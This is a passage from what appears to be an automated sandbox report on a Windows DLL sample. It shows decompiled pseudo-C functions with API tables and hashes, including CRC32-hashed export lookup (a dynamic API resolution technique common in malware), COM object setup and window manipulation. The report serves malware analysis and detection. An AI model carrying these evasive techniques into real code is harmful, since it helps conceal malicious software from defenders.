				void* _t186;
				char _t189;
				char _t190;
				signed int* _t191;
				WCHAR* _t194;

				_t80 =  &_v16;
				_t185 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				__imp__CoCreateInstance(0x7098d47c, 0, 1, 0x7098d43c, _t80);
				if(_t80 < 0) {
					L35:
					return _v32;
				}
				_t82 = _v36;
				_v24 = 0;
				_push( &_v24);
				_push(_t82);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))() < 0) {
					L10:
					_t85 = _v44;
					_v52 = _t185;
					_push( &_v52);
					_push(_t85);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
						L34:
						_t88 = _v52;
						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
						if(_v48 != _t185) {
							return 1;
						}
						goto L35;
					}
					_t138 = __imp__#2;
					_t194 =  *_t138(_v28);
					if(_t194 == _t185) {
						L33:
						_t92 = _v64;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
						goto L34;
					}
					_t186 =  *_t138(_v28);
					_t189 = 0;
					if(_t186 == 0) {
						L32:
						__imp__#6(_t194);
						_t185 = 0;
						goto L33;
					}
					_t95 = _v68;
					_push( &_v64);
					_v64 = 0;
					_push(_t186);
					_push(_t95);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))() < 0) {
						L21:
						if(_v52 != _t189) {
							_t98 =  &_v84;
							_v84 = _t189;
							__imp__CoCreateInstance(0x7098d45c, _t189, 1, 0x7098d42c, _t98);
							if(_t98 >= 0) {
								_t99 = _v60;
								if(_t99 != 0) {
									_t189 =  *_t138(_t99);
								}
								_t100 = _v104;
								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194);
								_t102 = _v112;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
								if(_t189 != 0) {
									_t117 = _v120;
									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
								}
								_t104 = _v120;
								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
								_t106 = _v128;
								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
								_t108 = _v136;
								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
								_t110 = _v144;
								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
								_t112 = _v148;
								_push(_v152);
								_push(_t112);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))() >= 0) {
									_v144 = 1;
								}
								_t115 = _v160;
								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
								if(_t189 != 0) {
									__imp__#6(_t189);
								}
							}
						}
						L31:
						__imp__#6(_t186);
						goto L32;
					}
					_t120 = _v76;
					_v84 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
					_t123 = lstrcmpiW(_t194, _v92);
					_t190 = _v44;
					if(_t123 == 0) {
						if(_t190 == 0) {
							_t130 = _v84;
							_v76 = _t190;
							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
							if(_v84 == _t190) {
								_t132 = _v92;
								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
							}
						}
						_v76 = 1;
					}
					_t124 = _v84;
					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
					if(_v80 != 0) {
						if(_t190 != 0) {
							_t126 = _v92;
							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
						}
						goto L31;
					} else {
						_t128 = _v92;
						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
						_t189 = 0;
						goto L21;
					}
				} else {
					_t191 = 0x7098ca30;
					do {
						_t134 =  *_t191;
						if((_v32 & _t134) == 0) {
							goto L7;
						}
						_t161 = _v44;
						_push( &_v36);
						_v36 = _t185;
						_push(_t134);
						_push(_t161);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))() < 0 || _v48 != _t185) {
							_v48 = _t185;
							goto L10;
						} else {
							_v48 = 1;
						}
						L7:
						_t191 =  &(_t191[1]);
					} while (_t191 < 0x7098ca3c);
					goto L10;
				}
			}






























































                                                                                                        0x70984a95
                                                                                                        0x70984a9f
                                                                                                        0x70984aad
                                                                                                        0x70984ab1
                                                                                                        0x70984ab5
                                                                                                        0x70984ab9
                                                                                                        0x70984ac1
                                                                                                        0x70984d2b
                                                                                                        0x00000000
                                                                                                        0x70984d2b
                                                                                                        0x70984ac7
                                                                                                        0x70984ad1
                                                                                                        0x70984ad7
                                                                                                        0x70984ad8
                                                                                                        0x70984ae0
                                                                                                        0x70984b25
                                                                                                        0x70984b25
                                                                                                        0x70984b2d
                                                                                                        0x70984b33
                                                                                                        0x70984b34
                                                                                                        0x70984b3c
                                                                                                        0x70984d12
                                                                                                        0x70984d12
                                                                                                        0x70984d1c
                                                                                                        0x70984d29
                                                                                                        0x70984d34
                                                                                                        0x70984d34
                                                                                                        0x00000000
                                                                                                        0x70984d29
                                                                                                        0x70984b46
                                                                                                        0x70984b4f
                                                                                                        0x70984b53
                                                                                                        0x70984d06
                                                                                                        0x70984d06
                                                                                                        0x70984d10
                                                                                                        0x00000000
                                                                                                        0x70984d10
                                                                                                        0x70984b60
                                                                                                        0x70984b62
                                                                                                        0x70984b66
                                                                                                        0x70984cfd
                                                                                                        0x70984cfe
                                                                                                        0x70984d04
                                                                                                        0x00000000
                                                                                                        0x70984d04
                                                                                                        0x70984b6c
                                                                                                        0x70984b74
                                                                                                        0x70984b75
                                                                                                        0x70984b7b
                                                                                                        0x70984b7c
                                                                                                        0x70984b84
                                                                                                        0x70984c15
                                                                                                        0x70984c19
                                                                                                        0x70984c1f
                                                                                                        0x70984c31
                                                                                                        0x70984c35
                                                                                                        0x70984c3d
                                                                                                        0x70984c43
                                                                                                        0x70984c49
                                                                                                        0x70984c4e
                                                                                                        0x70984c4e
                                                                                                        0x70984c50
                                                                                                        0x70984c5b
                                                                                                        0x70984c5d
                                                                                                        0x70984c68
                                                                                                        0x70984c6c
                                                                                                        0x70984c6e
                                                                                                        0x70984c79
                                                                                                        0x70984c79
                                                                                                        0x70984c7b
                                                                                                        0x70984c8a
                                                                                                        0x70984c8c
                                                                                                        0x70984c9e
                                                                                                        0x70984ca0
                                                                                                        0x70984caf
                                                                                                        0x70984cb1
                                                                                                        0x70984cc0
                                                                                                        0x70984cc2
                                                                                                        0x70984ccc
                                                                                                        0x70984ccd
                                                                                                        0x70984cd5
                                                                                                        0x70984cd7
                                                                                                        0x70984cd7
                                                                                                        0x70984cdf
                                                                                                        0x70984ce9
                                                                                                        0x70984ced
                                                                                                        0x70984cf0
                                                                                                        0x70984cf0
                                                                                                        0x70984ced
                                                                                                        0x70984c3d
                                                                                                        0x70984cf6
                                                                                                        0x70984cf7
                                                                                                        0x00000000
                                                                                                        0x70984cf7
                                                                                                        0x70984b8a
                                                                                                        0x70984b92
                                                                                                        0x70984b9d
                                                                                                        0x70984ba5
                                                                                                        0x70984bab
                                                                                                        0x70984bb1
                                                                                                        0x70984bb5
                                                                                                        0x70984bb7
                                                                                                        0x70984bbf
                                                                                                        0x70984bcd
                                                                                                        0x70984bd4
                                                                                                        0x70984bd6
                                                                                                        0x70984be5
                                                                                                        0x70984be5
                                                                                                        0x70984bd4
                                                                                                        0x70984be7
                                                                                                        0x70984be7
                                                                                                        0x70984bef
                                                                                                        0x70984bf9
                                                                                                        0x70984c00
                                                                                                        0x70984d37
                                                                                                        0x70984d39
                                                                                                        0x70984d44
                                                                                                        0x70984d44
                                                                                                        0x00000000
                                                                                                        0x70984c06
                                                                                                        0x70984c06
                                                                                                        0x70984c11
                                                                                                        0x70984c13
                                                                                                        0x00000000
                                                                                                        0x70984c13
                                                                                                        0x70984ae2
                                                                                                        0x70984ae2
                                                                                                        0x70984ae7
                                                                                                        0x70984ae7
                                                                                                        0x70984aed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70984aef
                                                                                                        0x70984af7
                                                                                                        0x70984af8
                                                                                                        0x70984afe
                                                                                                        0x70984b02
                                                                                                        0x70984b07
                                                                                                        0x70984b21
                                                                                                        0x00000000
                                                                                                        0x70984b10
                                                                                                        0x70984b10
                                                                                                        0x70984b10
                                                                                                        0x70984b14
                                                                                                        0x70984b14
                                                                                                        0x70984b17
                                                                                                        0x00000000
                                                                                                        0x70984ae7

                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(7098D47C,00000000,00000001,7098D43C,?), ref: 70984AB9
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984B4D
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984B5E
                                                                                                        • lstrcmpiW.KERNEL32(00000000,?), ref: 70984BA5
                                                                                                        • CoCreateInstance.OLE32(7098D45C,00000000,00000001,7098D42C,?), ref: 70984C35
                                                                                                        • SysAllocString.OLEAUT32(?), ref: 70984C4C
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984CF0
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984CF7
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 70984CFE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree$CreateInstance$lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1501015606-0
                                                                                                        • Opcode ID: 88e7900b9ab324498d5f910f1906ba44e0488b835761e2a562da47317243b6b7
                                                                                                        • Instruction ID: 306eb9c7c722faa8ba6ecffd8d8c30aca9bfc2149c3d969265f7c6681bd7bfb4
                                                                                                        • Opcode Fuzzy Hash: 88e7900b9ab324498d5f910f1906ba44e0488b835761e2a562da47317243b6b7
                                                                                                        • Instruction Fuzzy Hash: CB91E6B56047119FC200DF69C880E5BB7E9BFC8644F104A5CF99A9B3A0DB75E846CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70981E40, Relevance: 13.6, APIs: 9, Instructions: 147stringlibraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E70981E40() {
				short _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t72;
				signed int _t73;
				intOrPtr _t77;
				signed int _t78;
				CHAR* _t80;
				signed int _t83;
				signed int _t89;
				intOrPtr* _t90;
				char* _t96;
				intOrPtr* _t101;
				char* _t103;
				CHAR* _t106;
				char* _t108;
				CHAR* _t109;
				short _t112;
				struct HINSTANCE__* _t115;
				void* _t116;

				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
				_t58 = 1;
				 *(_t116 + 0x14) = 1;
				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
					L28:
					return _t58;
				} else {
					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
					 *(_t116 + 0x24) = _t83;
					if( *_t83 != 0x4550) {
						goto L28;
					}
					_t77 =  *((intOrPtr*)(_t83 + 0x78));
					_t78 = _t77 + _t101;
					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
					 *(_t116 + 0x14) = _t78;
					 *(_t116 + 0x1c) = _t89;
					 *(_t116 + 0xc) = 0;
					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
						L27:
						return _t58;
					}
					while(1) {
						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
						_t96 =  *(_t116 + 0x50);
						_t61 = _t60 ^  *(_t116 + 0x54);
						_t112 = 0;
						if(_t96 <= 0) {
							goto L25;
						}
						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
						while(_t61 !=  *_t90) {
							_t112 = _t112 + 1;
							_t90 = _t90 + 0x10;
							if(_t112 < _t96) {
								continue;
							}
							goto L25;
						}
						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
							L22:
							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
							_t101 =  *((intOrPtr*)(_t116 + 0x48));
							if(_t103 == 0) {
								 *(_t116 + 0x20) = 0;
							}
						} else {
							_t80 = StrDupA(_t103);
							if(_t80 == 0) {
								L24:
								_t78 =  *(_t116 + 0x1c);
								_t101 =  *((intOrPtr*)(_t116 + 0x48));
								goto L25;
							}
							 *(_t116 + 0x20) = 0;
							_t108 = StrChrA(_t80, 0x2e);
							if(_t108 == 0) {
								L20:
								LocalFree(_t80);
								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
									goto L24;
								}
								_t78 =  *(_t116 + 0x1c);
								goto L22;
							}
							 *_t108 = 0;
							_t109 = _t108 + 1;
							_t115 = GetModuleHandleA(_t80);
							if(_t115 != 0) {
								L18:
								 *(_t116 + 0x1c) = 1;
								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
								_t73 =  *(_t116 + 0x54);
								_push(_t73);
								_push(0x10);
								_push(_t116 + 0x3c);
								_push(_t115);
								 *(_t116 + 0x44) = _t72 ^ _t73;
								 *((intOrPtr*)(_t116 + 0x48)) = 0;
								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
								 *(_t116 + 0x50) = 0;
								E70981E40();
								_t103 =  *(_t116 + 0x50);
								_t116 = _t116 + 0x10;
								L19:
								_t112 =  *((intOrPtr*)(_t116 + 0x10));
								goto L20;
							}
							_t115 = LoadLibraryA(_t80);
							if(_t115 == 0) {
								goto L19;
							}
							goto L18;
						}
						L25:
						_t63 =  *(_t116 + 0x14) + 1;
						 *(_t116 + 0x14) = _t63;
						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
							_t89 =  *(_t116 + 0x24);
							continue;
						}
						_t58 =  *(_t116 + 0x20);
						goto L27;
					}
				}
			}
























                                                                                                        0x70981e44
                                                                                                        0x70981e48
                                                                                                        0x70981e4d
                                                                                                        0x70981e53
                                                                                                        0x70982021
                                                                                                        0x70982021
                                                                                                        0x70981e67
                                                                                                        0x70981e6a
                                                                                                        0x70981e72
                                                                                                        0x70981e76
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981e7d
                                                                                                        0x70981e84
                                                                                                        0x70981e88
                                                                                                        0x70981e91
                                                                                                        0x70981e98
                                                                                                        0x70981e9e
                                                                                                        0x70981ea2
                                                                                                        0x70981ea6
                                                                                                        0x70981eae
                                                                                                        0x7098201c
                                                                                                        0x00000000
                                                                                                        0x7098201c
                                                                                                        0x70981ec4
                                                                                                        0x70981ecb
                                                                                                        0x70981ed8
                                                                                                        0x70981edd
                                                                                                        0x70981ee1
                                                                                                        0x70981ee5
                                                                                                        0x70981ee9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981eef
                                                                                                        0x70981ef3
                                                                                                        0x70981ef7
                                                                                                        0x70981ef8
                                                                                                        0x70981efd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981eff
                                                                                                        0x70981f17
                                                                                                        0x70981f1b
                                                                                                        0x70981f1f
                                                                                                        0x70981fe0
                                                                                                        0x70981fe6
                                                                                                        0x70981fec
                                                                                                        0x70981ff0
                                                                                                        0x70981ff2
                                                                                                        0x70981ff2
                                                                                                        0x70981f3e
                                                                                                        0x70981f45
                                                                                                        0x70981f49
                                                                                                        0x70981ffc
                                                                                                        0x70981ffc
                                                                                                        0x70982000
                                                                                                        0x00000000
                                                                                                        0x70982000
                                                                                                        0x70981f52
                                                                                                        0x70981f60
                                                                                                        0x70981f64
                                                                                                        0x70981fce
                                                                                                        0x70981fcf
                                                                                                        0x70981fda
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981fdc
                                                                                                        0x00000000
                                                                                                        0x70981fdc
                                                                                                        0x70981f66
                                                                                                        0x70981f6a
                                                                                                        0x70981f71
                                                                                                        0x70981f75
                                                                                                        0x70981f84
                                                                                                        0x70981f85
                                                                                                        0x70981f98
                                                                                                        0x70981f9f
                                                                                                        0x70981fa3
                                                                                                        0x70981fa4
                                                                                                        0x70981faa
                                                                                                        0x70981fad
                                                                                                        0x70981fae
                                                                                                        0x70981fb2
                                                                                                        0x70981fb6
                                                                                                        0x70981fba
                                                                                                        0x70981fbe
                                                                                                        0x70981fc3
                                                                                                        0x70981fc7
                                                                                                        0x70981fca
                                                                                                        0x70981fca
                                                                                                        0x00000000
                                                                                                        0x70981fca
                                                                                                        0x70981f7e
                                                                                                        0x70981f82
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70981f82
                                                                                                        0x70982004
                                                                                                        0x70982008
                                                                                                        0x70982009
                                                                                                        0x70982010
                                                                                                        0x70981ec0
                                                                                                        0x00000000
                                                                                                        0x70981ec0
                                                                                                        0x70982016
                                                                                                        0x00000000
                                                                                                        0x7098201b
                                                                                                        0x70981ec4

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(00000100,00000100,00000000,?,?,?,?,?,70989143), ref: 70981ECE
                                                                                                        • RtlComputeCrc32.NTDLL ref: 70981ED8
                                                                                                        • StrDupA.SHLWAPI(?,00000000,00000100,00000000,?,?,?,?,?,70989143), ref: 70981F3F
                                                                                                        • StrChrA.SHLWAPI(?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F5A
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F6B
                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F78
                                                                                                        • lstrlenA.KERNEL32(00000001,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981F8D
                                                                                                        • RtlComputeCrc32.NTDLL ref: 70981F98
                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,00000000,0000002E,?,?,?,?,?,70989143), ref: 70981FCF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 1770823755-0
                                                                                                        • Opcode ID: c19139ccac08119deb3562ffcbea3c69a3c37fcfa05a8c7deaeaafbc1b04aa14
                                                                                                        • Instruction ID: 15c069c27ccb2da21223200f77bc45301237152441465dd005028623a55f4781
                                                                                                        • Opcode Fuzzy Hash: c19139ccac08119deb3562ffcbea3c69a3c37fcfa05a8c7deaeaafbc1b04aa14
                                                                                                        • Instruction Fuzzy Hash: 7F5114B12083058FC304DF59C884A5EB7EAEF89708F14492DE99697392D7B5E801CB96
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A0B0, Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E7098A0B0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;
				void* _t15;
				WCHAR* _t16;
				intOrPtr _t23;
				struct HWND__* _t27;

				_t5 = _a8;
				if(_t5 == 0) {
					_t27 = _a4;
					SetWindowLongW(_t27, 0xffffffec, GetWindowLongW(_t27, 0xffffffec) | 0x00000008);
					SetWindowPos(_t27, 0xffffffff, 0, 0, 0, 0, 3);
					BringWindowToTop(_t27);
					SetForegroundWindow(_t27);
					SendMessageW(_t27, 0x473, 1, 1);
					SendMessageW(_t27, 0x46f, 8, 0);
					goto L7;
				} else {
					_t15 = _t5 - 2;
					if(_t15 == 0) {
						_t23 =  *0x7098f6cc; // 0x0
						_push(0);
						_push(0);
						_push(0);
						_t16 = StrChrW(0x7098caf4, 0x63);
						if(E709844E0(StrChrW(0x7098cec0, 0x72), _t16, _t23) != 0) {
							goto L7;
						} else {
							return 1;
						}
					} else {
						if(_t15 != 0x83f0) {
							L7:
							return 0;
						} else {
							 *0x7098f6cc = _a12;
							return 0;
						}
					}
				}
			}








                                                                                                        0x7098a0b4
                                                                                                        0x7098a0b8
                                                                                                        0x7098a115
                                                                                                        0x7098a12a
                                                                                                        0x7098a13d
                                                                                                        0x7098a144
                                                                                                        0x7098a14b
                                                                                                        0x7098a161
                                                                                                        0x7098a16d
                                                                                                        0x00000000
                                                                                                        0x7098a0ba
                                                                                                        0x7098a0ba
                                                                                                        0x7098a0bd
                                                                                                        0x7098a0d9
                                                                                                        0x7098a0e5
                                                                                                        0x7098a0e7
                                                                                                        0x7098a0e9
                                                                                                        0x7098a0f3
                                                                                                        0x7098a10a
                                                                                                        0x00000000
                                                                                                        0x7098a10c
                                                                                                        0x7098a112
                                                                                                        0x7098a112
                                                                                                        0x7098a0bf
                                                                                                        0x7098a0c4
                                                                                                        0x7098a170
                                                                                                        0x7098a173
                                                                                                        0x7098a0ca
                                                                                                        0x7098a0ce
                                                                                                        0x7098a0d6
                                                                                                        0x7098a0d6
                                                                                                        0x7098a0c4
                                                                                                        0x7098a0bd

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CAF4,00000063,00000000,00000000,00000000,00000000,00000000,7098A4CC,00000000,000083F2,00000000,00000000,00000000,00000000,000000C8,?), ref: 7098A0F3
                                                                                                        • StrChrW.SHLWAPI(7098CEC0,00000072,00000000), ref: 7098A0FD
                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 7098A11D
                                                                                                        • SetWindowLongW.USER32 ref: 7098A12A
                                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 7098A13D
                                                                                                        • BringWindowToTop.USER32(00000000), ref: 7098A144
                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 7098A14B
                                                                                                        • SendMessageW.USER32(00000000,00000473,00000001,00000001), ref: 7098A161
                                                                                                        • SendMessageW.USER32(00000000,0000046F,00000008,00000000), ref: 7098A16D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$LongMessageSend$BringForeground
                                                                                                        • String ID:
                                                                                                        • API String ID: 4108379202-0
                                                                                                        • Opcode ID: 0cfe039ba70c1ed00411272ed5fcb25f064313c71227ba3502da14e70028866d
                                                                                                        • Instruction ID: 5a180a23d6203845036094df1a185a1e7a9974792fa6d5e1b75ab8dfef6dbcbc
                                                                                                        • Opcode Fuzzy Hash: 0cfe039ba70c1ed00411272ed5fcb25f064313c71227ba3502da14e70028866d
                                                                                                        • Instruction Fuzzy Hash: 08110D7335C3107BF2205B659C0AF4F3658DB81B21F204216F702FA3E1D7B4690197A6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709832A0, Relevance: 13.6, APIs: 9, Instructions: 64memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E709832A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v0;
				void* _t22;
				void* _t29;
				signed int _t31;

				_t31 = 0;
				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
				if(_t22 != 0) {
					_push(2);
					_push(_a12);
					_push(_a8);
					_push(_a4);
					_v0 = wsprintfW(_t22, StrChrW(0x7098c664, 0x25));
					_t29 = E7098A7A0(_t22, 0, 0);
					if(_t29 != 0) {
						_t31 = RtlComputeCrc32(0, _t29, _v0) % 0xffffff7f;
						asm("bswap esi");
						HeapFree(GetProcessHeap(), 0, _t29);
					}
					HeapFree(GetProcessHeap(), 0, _t22);
				}
				return _t31;
			}







                                                                                                        0x709832b1
                                                                                                        0x709832bc
                                                                                                        0x709832c0
                                                                                                        0x709832cf
                                                                                                        0x709832d1
                                                                                                        0x709832d2
                                                                                                        0x709832d3
                                                                                                        0x709832ec
                                                                                                        0x709832f5
                                                                                                        0x709832fc
                                                                                                        0x70983316
                                                                                                        0x70983318
                                                                                                        0x7098331d
                                                                                                        0x7098331d
                                                                                                        0x70983329
                                                                                                        0x7098332f
                                                                                                        0x70983336

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001000,00000100,00000000,00000000,00B71E90,709890B4,00B76080,00B71E90,00B61638,00B757B8,00000001,7098F3C8,00000008), ref: 709832B3
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709832B6
                                                                                                        • StrChrW.SHLWAPI(7098C664,00000025,?,?,?,00000002,77E34620), ref: 709832DB
                                                                                                        • wsprintfW.USER32 ref: 709832E3
                                                                                                          • Part of subcall function 7098A7A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,77E34620,00000000,74B04F20,00000000,709832F5,00000000,00000000,00000000), ref: 7098A7C1
                                                                                                          • Part of subcall function 7098A7A0: GetProcessHeap.KERNEL32(00000008,00000001), ref: 7098A7D3
                                                                                                          • Part of subcall function 7098A7A0: HeapAlloc.KERNEL32(00000000), ref: 7098A7DA
                                                                                                          • Part of subcall function 7098A7A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 7098A7EE
                                                                                                        • RtlComputeCrc32.NTDLL ref: 70983305
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 7098331A
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098331D
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70983326
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70983329
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocByteCharFreeMultiWide$ComputeCrc32wsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1190661824-0
                                                                                                        • Opcode ID: 304578db4fd0ab926957ee3c89808b77de685711e1b9c537efa985b2238300f3
                                                                                                        • Instruction ID: 500bce39f32e844228f553e2976015c552f02aa0c8d69990b1afaffb710f147e
                                                                                                        • Opcode Fuzzy Hash: 304578db4fd0ab926957ee3c89808b77de685711e1b9c537efa985b2238300f3
                                                                                                        • Instruction Fuzzy Hash: A401A1F26143017FE2009BA68C4DF6F7AACDBC5A61F10452AB616833D0DAB4DC0186B2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983CB0, Relevance: 12.1, APIs: 8, Instructions: 67memoryregistrythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E70983CB0(intOrPtr* _a8) {
				struct _SERVICE_STATUS* _v4;
				int _v8;
				WCHAR* _t9;
				int _t10;
				void* _t13;
				int _t14;
				signed int _t18;
				short* _t20;
				int _t21;
				void _t22;
				void* _t23;
				void* _t26;
				intOrPtr* _t27;
				void* _t30;

				_t9 =  *0x7098f5cc; // 0xb757b8
				_t10 = SetCurrentDirectoryW(_t9);
				_t27 = _a8;
				 *0x7098f4ec = 0x20;
				 *0x7098f4f0 = 2;
